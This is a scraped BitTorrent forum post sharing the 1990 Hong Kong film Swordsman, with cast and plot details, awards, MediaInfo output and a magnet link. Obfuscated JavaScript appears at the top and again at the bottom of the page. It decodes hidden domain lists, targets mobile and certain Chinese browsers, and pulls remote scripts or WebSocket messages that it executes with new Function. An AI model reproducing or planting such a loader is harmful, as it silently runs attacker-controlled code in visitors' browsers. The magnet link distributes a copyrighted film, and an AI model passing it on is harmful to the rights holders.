笑傲江湖[国粤语配音/中文字幕].Swordsman.1990.1080p.BluRay.x265.10bit.DTS.2Audio 8.09GB

版主小s 1月前 392

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 笑傲江湖 / Swordsman

◎年 代 1990

◎产 地 中国香港 / 中国台湾

◎类 别 动作 / 武侠 / 古装

◎语 言 粤语

◎上映日期 1990-01-27(中国台湾) / 1990-04-05(中国香港)

◎IMDb链接 https://www.imdb.com/title/tt0100973/

◎豆瓣评分 8.0/10 (86603人评价)

◎豆瓣链接 https://movie.douban.com/subject/1297304/

◎片 长 118分钟

◎导 演 胡金铨 King Hu (id:1048426)

徐克 Hark Tsui (id:1007152)

李惠民 Raymond Lee (id:1319466)

程小东 Siu-Tung Ching (id:1280664)

金扬桦 Yeung-Wah Kam (id:1327639)

许鞍华 Ann Hui (id:1053570)

◎编 剧 黄鹰 Ying Wong (id:1316778)

林纪陶 Jason Lam (id:1289291)

金庸 Louis Cha (id:1019677)

刘大木 Tai-Mok Lau (id:1354545)

梁耀明 Yiu-ming Leung (id:1377232)

关文亮 Man-Leung Kwan (id:1377230)

戴富浩 Foo Ho Tai (id:1377231)

◎演 员 许冠杰 Samuel Hui (id:1102963)

叶童 Cecilia Yip (id:1033481)

张学友 Jacky Cheung (id:1012563)

张敏 Sharla Cheung (id:1005297)

袁洁莹 Fennie Yuen (id:1051082)

刘兆铭 Lau Siu Ming (id:1313719)

元华 Wah Yuen (id:1050240)

刘洵 Shun Lau (id:1274304)

林正英 Ching-Ying Lam (id:1016823)

午马 Wu Ma (id:1054282)

韩英杰 Ying-Chieh Han (id:1274444)

冯雪瑞 Xuerui Feng (id:1329826)

甘山 San Gam (id:1316752)

江全 Chuen Chiang (id:1422721)

许鞍华 Ann Hui (id:1053570)

徐克 Hark Tsui (id:1007152)

黄霑 James Wong (id:1008091)

戴乐民 Romeo Díaz (id:1282921)

鲍德熹 Peter Pau (id:1294116)

林国华 Ardy Lam (id:1289296)

李亚东 Ya Tung Li (id:1414064)

黄永恒 Wing-Hung Wong (id:1300411)

麦子善 Marco Mak (id:1280638)

胡大为 David Wu (id:1301332)

胡金铨 King Hu (id:1048426)

梁华生 James Leung (id:1289862)

吴宝玲 Po-ling Ng (id:1293135)

张西美 Edith Cheung (id:1377233)

程小东 Siu-Tung Ching (id:1280664)

刘志豪 Chi-Ho Lau (id:1289496)

罗大佑 Tayu Lo (id:1011384)

罗礼贤 Bruce Law (id:1289542)

◎标 签 武侠 / 徐克 / 香港 / 香港电影 / 动作 / 经典 / 许冠杰 / 胡金铨

◎简 介

大内库藏武功秘笈《葵花宝典》失窃。东厂主管太监古今福(刘洵 饰)率千户欧阳全(张学友 饰)等,南下调查辞官锦衣卫林镇南,同时收用“五岳盟主”左冷禅(元华 饰)外围策应。华山派大弟子令狐冲(许冠杰 饰)与师妹岳灵珊(叶童 饰)奉师命增援林镇南,无奈两人实力不济,领得林镇南遗嘱后遁走,二人于路先后巧遇顺风堂堂主刘正风(午马 饰)、日月神教长老曲洋(林正英 饰)、华山派风清扬,获传《笑傲江湖》曲谱和独孤九剑。

各路人马为《葵花宝典》纷纷聚于苗人地界,欧阳全与左冷禅争功不下,遂假扮林平之混入华山派一行。令狐冲结识日月神教任盈盈(张敏 饰)与蓝凤凰(袁洁莹 饰),因曲洋之关系得其协助。古今福与岳不群为《葵花宝典》大打出手,令狐冲不忍一班师兄弟受牵连愤而使出独孤九剑,始明了“笑傲江湖”真意。

本片根据金庸同名小说改编。

◎获奖情况 (共14项)

第27届台北金马影展 (1990)

金马奖 最佳剧情片(提名)

金马奖 最佳男配角

└──张学友 (id:1012563)

金马奖 最佳改编剧本(提名)

金马奖 最佳摄影(提名)

金马奖 最佳美术设计(提名)

└──梁华生 (id:1289862)

金马奖 最佳造型设计(提名)

金马奖 最佳原创歌曲

金马奖 最佳剪辑(提名)

第10届香港电影金像奖 (1991)

最佳男配角(提名)

最佳剪接(提名)

最佳美术指导(提名)

└──梁华生 (id:1289862)

最佳动作设计

└──程小东 (id:1280664)

最佳原创电影音乐(提名)

最佳原创电影歌曲

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 203185747687565138008725841453083458305 (0x98DC26CD94C50EA87FA6A995A0AAFB01)

  4. Complete name : [email protected]OM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 8.09 GiB

  8. Duration : 1 h 57 min

  9. Overall bit rate : 9 849 kb/s

  10. Movie name : Swordsman

  11. Encoded date : UTC 2021-10-19 10:00:57

  12. Writing application : mkvmerge v51.0.0 ('I Wish') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.2

  14. Attachments : FZLTZHUNHK.TTF


  15. Video

  16. ID : 1

  17. Format : HEVC

  18. Format/Info : High Efficiency Video Coding

  19. Format profile : Main [email protected]@Main

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 1 h 57 min

  22. Bit rate : 7 665 kb/s

  23. Width : 1 920 pixels

  24. Height : 1 038 pixels

  25. Display aspect ratio : 1.85:1

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.160

  32. Stream size : 6.29 GiB (78%)

  33. Writing library : x265 3.4+1-g07e3381df+31:[Windows][GCC 10.1.0][64 bit] Yuuki 10bit+8bit+12bit

  34. Encoding settings : rc=crf / crf=19.0000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.70 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=3 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x1038 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.01 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  35. Default : Yes

  36. Forced : No


  37. Audio #1

  38. ID : 2

  39. ID in the original source medium : 4353 (0x1101)

  40. Format : AC-3

  41. Format/Info : Audio Coding 3

  42. Commercial name : Dolby Digital

  43. Codec ID : A_AC3

  44. Duration : 1 h 57 min

  45. Bit rate mode : Constant

  46. Bit rate : 640 kb/s

  47. Channel(s) : 6 channels

  48. Channel layout : L R C LFE Ls Rs

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 31.250 FPS (1536 SPF)

  51. Compression mode : Lossy

  52. Stream size : 537 MiB (6%)

  53. Title : Mandarin

  54. Language : Chinese

  55. Service kind : Complete Main

  56. Default : Yes

  57. Forced : No

  58. Original source medium : Blu-ray


  59. Audio #2

  60. ID : 3

  61. ID in the original source medium : 4352 (0x1100)

  62. Format : DTS

  63. Format/Info : Digital Theater Systems

  64. Codec ID : A_DTS

  65. Duration : 1 h 57 min

  66. Bit rate mode : Constant

  67. Bit rate : 1 509 kb/s

  68. Channel(s) : 6 channels

  69. Channel layout : C L R Ls Rs LFE

  70. Sampling rate : 48.0 kHz

  71. Frame rate : 93.750 FPS (512 SPF)

  72. Bit depth : 16 bits

  73. Compression mode : Lossy

  74. Delay relative to video : 83 ms

  75. Stream size : 1.24 GiB (15%)

  76. Title : Cantonese

  77. Language : Chinese

  78. Default : No

  79. Forced : No

  80. Original source medium : Blu-ray


  81. Text #1

  82. ID : 4

  83. Format : ASS

  84. Codec ID : S_TEXT/ASS

  85. Codec ID/Info : Advanced Sub Station Alpha

  86. Duration : 1 h 52 min

  87. Bit rate : 80 b/s

  88. Count of elements : 1360

  89. Compression mode : Lossless

  90. Stream size : 65.9 KiB (0%)

  91. Title : chs

  92. Language : Chinese

  93. Default : Yes

  94. Forced : No


  95. Text #2

  96. ID : 5

  97. ID in the original source medium : 4608 (0x1200)

  98. Format : PGS

  99. Muxing mode : zlib

  100. Codec ID : S_HDMV/PGS

  101. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  102. Duration : 1 h 53 min

  103. Bit rate : 40.3 kb/s

  104. Count of elements : 2852

  105. Stream size : 32.7 MiB (0%)

  106. Title : cht

  107. Language : Chinese

  108. Default : No

  109. Forced : No

  110. Original source medium : Blu-ray


  111. Text #3

  112. ID : 6

  113. ID in the original source medium : 4609 (0x1201)

  114. Format : PGS

  115. Muxing mode : zlib

  116. Codec ID : S_HDMV/PGS

  117. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  118. Duration : 1 h 53 min

  119. Bit rate : 36.0 kb/s

  120. Count of elements : 2852

  121. Stream size : 29.2 MiB (0%)

  122. Title : eng

  123. Language : English

  124. Default : No

  125. Forced : No

  126. Original source medium : Blu-ray


  127. Menu

  128. 00:00:00.000 : en:第 01 章

  129. 00:04:42.073 : en:第 02 章

  130. 00:09:24.355 : en:第 03 章

  131. 00:17:26.045 : en:第 04 章

  132. 00:22:21.089 : en:第 05 章

  133. 00:27:58.593 : en:第 06 章

  134. 00:31:59.208 : en:第 07 章

  135. 00:41:22.354 : en:第 08 章

  136. 00:46:58.774 : en:第 09 章

  137. 00:53:16.568 : en:第 10 章

  138. 00:58:00.852 : en:第 11 章

  139. 01:06:43.374 : en:第 12 章

  140. 01:11:26.198 : en:第 13 章

  141. 01:15:27.481 : en:第 14 章

  142. 01:22:21.519 : en:第 15 章

  143. 01:29:46.130 : en:第 16 章

  144. 01:34:23.366 : en:第 17 章

  145. 01:37:37.977 : en:第 18 章

  146. 01:46:46.108 : en:第 19 章

  147. 01:54:56.472 : en:第 20 章




复制代码


TAGS 武侠 动作 古装

磁力链:
  • magnet:?xt=urn:btih:D9C1526C6D6D68DF8145F618629642F4ABFECBD8

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};